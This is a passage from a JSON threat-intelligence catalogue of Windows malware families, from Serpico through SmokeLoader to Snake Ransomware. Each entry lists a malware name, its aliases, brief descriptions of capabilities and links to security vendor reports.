"refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" ], "synonyms": [], "type": [] }, "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", "value": "Serpico" }, { "description": "ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.\r\n\r\nProofPoint noticed two distinct variant - \"tunnel\" and \"downloader\" (citation):\r\n\"The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader.\"\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper", "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners", "https://insights.oem.avira.com/ta505-apt-group-targets-americas/", "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware", "https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/", "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/", "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [], "type": [] }, "uuid": "cebfa7af-8c31-4dda-8373-82893c7f43f4", "value": "ServHelper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer", "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", "https://mauronz.github.io/shadowhammer-backdoor", "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/", "https://www.youtube.com/watch?v=T5wPwvLrBYU", "https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows", "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/", "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/", "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/", "https://blog.reversinglabs.com/blog/forging-the-shadowhammer", "https://securelist.com/operation-shadowhammer/89992/", "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/" ], "synonyms": [ "DAYJOB" ], "type": [] }, "uuid": "51728278-a95c-45a5-9ae0-9897d41d0efb", "value": "shadowhammer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", "https://securelist.com/shadowpad-in-corporate-networks/81432/", "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", "https://www.youtube.com/watch?v=55kaaMGBARM", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/" ], "synonyms": [ "POISONPLUG.SHADOW", "XShellGhost" ], "type": [] }, "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", "value": "ShadowPad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" ], "synonyms": [], "type": [] }, "uuid": "f64683c8-50ab-42c0-8b90-881598906528", "value": "Shakti" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" ], "synonyms": [], "type": [] }, "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", "value": "SHAPESHIFT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" ], "synonyms": [ "remotecmd" ], "type": [] }, "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", "value": "shareip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", "https://eromang.zataz.com/tag/agentbase-exe/", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" ], "synonyms": [ "Bitrep" ], "type": [] }, "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", "value": "SHARPKNOT" }, { "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called “Stage_One”. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage", "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign" ], "synonyms": [], "type": [] }, "uuid": "11788d9b-485b-4049-ba5e-1b06d526361e", "value": "SharpStage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstats", "https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf" ], "synonyms": [], "type": [] }, "uuid": "819fd946-ed0e-4cec-ad45-66b88e39b732", "value": "SHARPSTATS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", "https://twitter.com/JaromirHorejsi/status/813726714228604928" ], "synonyms": [], "type": [] }, "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", "value": "ShellLocker" }, { "description": "Shifu was originally discovered by Trusteer security researchers (Ilya Kolmanovich, Denis Laskov) in the middle of 2015. It is a banking trojan mostly focusing on Japanese banks and has rich features for remote data extraction and control.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/", "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], "synonyms": [], "type": [] }, "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", "value": "Shifu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-walker" ], "synonyms": [], "type": [] }, "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", "value": "Shim RAT" }, { "description": "SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "07470989-faac-44fb-b505-1d5568b3c716", "value": "SHIPSHAPE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/" ], "synonyms": [], "type": [] }, "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", "value": "Shujin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" ], "synonyms": [], "type": [] }, "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", "value": "Shurl0ckr" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/", "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw" ], "synonyms": [ "Caphaw" ], "type": [] }, "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", "value": "Shylock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html", "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/", "https://www.secrss.com/articles/26507", "https://s.tencent.com/research/report/659.html", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", "https://s.tencent.com/research/report/479.html" ], "synonyms": [], "type": [] }, "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", "value": "SideWinder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks", "https://www.secureworks.com/research/threat-profiles/nickel-academy", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.us-cert.gov/ncas/alerts/TA14-353A", "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware" ], "synonyms": [ "Destover" ], "type": [] }, "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", "value": "Sierra(Alfa,Bravo, ...)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" ], "synonyms": [], "type": [] }, "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", "value": "Siggen6" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sihost", "https://threatrecon.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists/" ], "synonyms": [], "type": [] }, "uuid": "c1b6e597-17e6-4485-819e-5aa03904bc61", "value": "sihost" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/", "https://github.com/Tera0017/TAFOF-Unpacker", "http://www.intezer.com/silenceofthemoles/", "https://www.group-ib.com/resources/threat-research/silence.html", "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/", "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", "https://securelist.com/the-silence/83009/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf", "https://norfolkinfosec.com/some-notes-on-the-silence-proxy/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [ "TrueBot" ], "type": [] }, "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", "value": "Silence" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm", "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html" ], "synonyms": [], "type": [] }, "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", "value": "Silon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" ], "synonyms": [], "type": [] }, "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", "value": "Siluhdur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", "https://www.youtube.com/watch?v=u2HEGDzd8KM", "https://blog.trendmicro.com/trendlabs-security-intelligence/simda-a-botnet-takedown/", "https://secrary.com/ReversingMalware/iBank/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/" ], "synonyms": [ "iBank" ], "type": [] }, "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", "value": "Simda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover", "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" ], "synonyms": [], "type": [] }, "uuid": "b56173a1-84e3-4551-ac4a-9e71e65dc9e5", "value": "SimpleFileMover" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", "https://www.recordedfuture.com/turla-apt-infrastructure/", "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan", "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://en.wikipedia.org/wiki/Torpig", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/" ], "synonyms": [ "Anserin", "Mebroot", "Quarian", "Theola", "Torpig" ], "type": [] }, "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", "value": "Sinowal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" ], "synonyms": [], "type": [] }, "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", "value": "Sisfader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skimer", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", "http://atm.cybercrime-tracker.net/index.php", "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] }, "uuid": "6d5e558a-e640-49c3-87b9-2c102c334b1b", "value": "Skimer" }, { "description": "A Microsoft SQL Server backdoor", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20", "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "6a59a639-8070-4c5f-86be-8a2a081cf487", "value": "skip-2.0" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper", "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf", "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/", "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/" ], "synonyms": [], "type": [] }, "uuid": "fac6313b-8068-429c-93ae-21e8072cf667", "value": "Skipper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" ], "synonyms": [], "type": [] }, "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", "value": "Skyplex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", "value": "Slave" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", "https://www.us-cert.gov/ncas/analysis-reports/ar20-045b" ], "synonyms": [], "type": [] }, "uuid": "a82f80fc-71e8-4dee-8a64-e5cbb4100321", "value": "SLICKSHOES" }, { "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", "https://securelist.com/apt-slingshot/84312/", "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" ], "synonyms": [], "type": [] }, "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", "value": "Slingshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver", "https://github.com/BishopFox/sliver" ], "synonyms": [], "type": [] }, "uuid": "654c478e-3c9a-4fd9-a9b7-dd6839f51147", "value": "Sliver" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a", "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" ], "synonyms": [ "QueenOfClubs" ], "type": [] }, "uuid": "f23d70bc-7de6-49bd-bb69-82518b4d7fca", "value": "SlothfulMedia" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub", "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf", "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/", "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html" ], "synonyms": [], "type": [] }, "uuid": "1bc01fca-9a1e-4669-bd9d-8dd29416f9c1", "value": "SLUB" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-express" ], "synonyms": [ "speccom" ], "type": [] }, "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", "value": "smac" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager", "https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4", "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", "https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html", "https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214", "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1", "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html", "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/" ], "synonyms": [ "PhantomNet" ], "type": [] }, "uuid": "1a6a6e4c-3e0e-422b-9840-9c6286dc7b17", "value": "SManager" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes", "https://www.virustotal.com/gui/file/4eb840617883bf6ed7366242ffee811ad5ea3d5bfd2a589a96d6ee9530690d28/details" ], "synonyms": [], "type": [] }, "uuid": "67723f6e-822b-475a-938b-c9114b9aefea", "value": "SmartEyes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug", "https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service", "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/" ], "synonyms": [], "type": [] }, "uuid": "b81cbf03-8909-4833-badf-4df32c9bf6cb", "value": "SMAUG Ransomware" }, { "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", "https://research.checkpoint.com/2019-resurgence-of-smokeloader/", "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/", "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", "https://hatching.io/blog/tt-2020-08-27/", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886", "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/", "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html", "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html", "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/" ], "synonyms": [ "Dofoil", "Sharik", "Smoke", "Smoke Loader" ], "type": [] }, "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", "value": "SmokeLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" ], "synonyms": [ "Ismo" ], "type": [] }, "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", "value": "Smominru" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32", "https://www.bleepingcomputer.com/forums/t/623132/smrss32-encrypted-ransomware-help-support-how-to-decryptbmp/", "https://www.youtube.com/watch?v=7gCU31ScJgk" ], "synonyms": [], "type": [] }, "uuid": "1fe0b2fe-5f9b-4359-b362-be611537442a", "value": "Smrss32 Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sn0wslogger", "https://twitter.com/struppigel/status/1354806038805897216" ], "synonyms": [], "type": [] }, "uuid": "17c6c227-5c9b-40eb-886b-19e2b137c5e8", "value": "Sn0wsLogger" }, { "description": "Snake Ransomware is a Golang ransomware reportedly containing obfuscation not typically seen in Golang 